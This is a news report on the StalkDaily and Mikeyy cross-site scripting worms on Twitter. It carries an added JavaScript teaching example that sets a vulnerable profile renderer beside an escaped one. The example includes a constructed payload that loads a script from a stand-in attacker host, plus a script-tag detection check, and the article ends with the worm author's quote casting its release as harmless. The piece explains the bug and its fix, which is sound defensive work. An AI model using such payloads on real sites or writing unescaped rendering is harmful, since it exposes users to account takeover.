Chicago (IL) – The Twitter micro-blogging network has been hit by two cross-site scripting (XSS) attacks that spread messages from user accounts across the system without users’ consent. The initial “StalkDaily” messages that appeared over the weekend are now followed by a “Mikeyy” attack that apparently can infect a Twitter account when its owner simply views another infected Twitter page.
The attack was first reported to have surfaced late Friday last week and has since mutated somewhat, with different messages.
Security firms such as Sophos indicate that users do not need to click on a suspicious message containing the words “StalkDaily” or “Mikeyy” to get infected, but will be hit simply by viewing an infected profile page. While Twitter said it is closing the vulnerabilities, security experts advise users to use third-party Twitter clients such as TweetDeck and, if they are using the web-based Twitter interface, not to click on “StalkDaily” or “Mikeyy” messages and to stay away from viewing user profiles.
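The mechanism the reports describe is a stored XSS: a script saved in one user’s profile runs in the browser of anyone who views that profile, and from there rewrites the viewer’s own profile and status. The following is an added example, not code from the original article and not Twitter’s code, that models that pattern in a few lines of JavaScript: a hypothetical profile-rendering function that concatenates a stored field straight into HTML, the same function with HTML output encoding, a simple check for script elements in rendered output, and a simulated page view. The profile field name, the payload string and the visit simulation are all constructed for illustration; no real script is executed.

```javascript
// Added example (not from the original article or from Twitter): the stored-XSS
// pattern behind a profile worm, and its fix. Field names, render functions and
// the payload are hypothetical/constructed.

// Encode the five characters that matter at an HTML text boundary.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  })[c]);
}

// Constructed attacker-controlled profile field. The script source is a
// placeholder; any stored string echoed into HTML unencoded is enough.
const INJECTED_LOCATION =
  'Chicago<script src="//evil.example/worm.js"></script>';

// Vulnerable rendering: the stored field is concatenated straight into HTML,
// so the browser of anyone viewing this profile parses and runs the script.
function renderProfileVulnerable(profile) {
  return `<div class="location">${profile.location}</div>`;
}

// Hardened rendering: encode on output, at the HTML boundary, so the payload
// is displayed as text instead of parsed as markup.
function renderProfileSafe(profile) {
  return `<div class="location">${escapeHtml(profile.location)}</div>`;
}

// Check a test suite could run over rendered pages: does a script element
// appear that the template itself never emits?
function containsInjectedScript(html) {
  return /<script\b/i.test(html);
}

// Simulated page view. In the real attack the injected script runs with the
// viewer's own session and writes the same payload into the viewer's profile,
// which is what turns one stored XSS into a worm. Here that step is modelled
// with a plain function; nothing is executed.
function simulateVisit(viewerProfile, html) {
  if (containsInjectedScript(html)) {
    return { ...viewerProfile, location: INJECTED_LOCATION }; // viewer now infected
  }
  return viewerProfile; // viewer unchanged
}

function demo() {
  const attacker = { name: "attacker", location: INJECTED_LOCATION };
  const viewer = { name: "alice", location: "Portland" };
  return {
    afterVulnerable: simulateVisit(viewer, renderProfileVulnerable(attacker)),
    afterSafe: simulateVisit(viewer, renderProfileSafe(attacker)),
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

The fix is output encoding at the point where untrusted data meets HTML, applied to every profile field, not a blocklist of known message text; a Content Security Policy that forbids inline and third-party scripts would additionally stop the injected script from loading even if one encoding site were missed.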
There are no reports of actual damage caused by the XSS attacks.
BNONews reported that the attacks were created by 17-year-old Mike Mooney out of “boredom”, to “make money” and to promote his own website StalkDaily.
“I am the person who coded the XSS which then acted as a worm when it auto updated a user’s profile and status, which then infected other users who viewed their profile,” he wrote to BNONews. “I did this out of boredom, to be honest. I usually like to find vulnerabilities within websites and try not to cause too much damage, but start a worm or something to give the developers an insight on the problem and while doing so, promoting myself or my website.”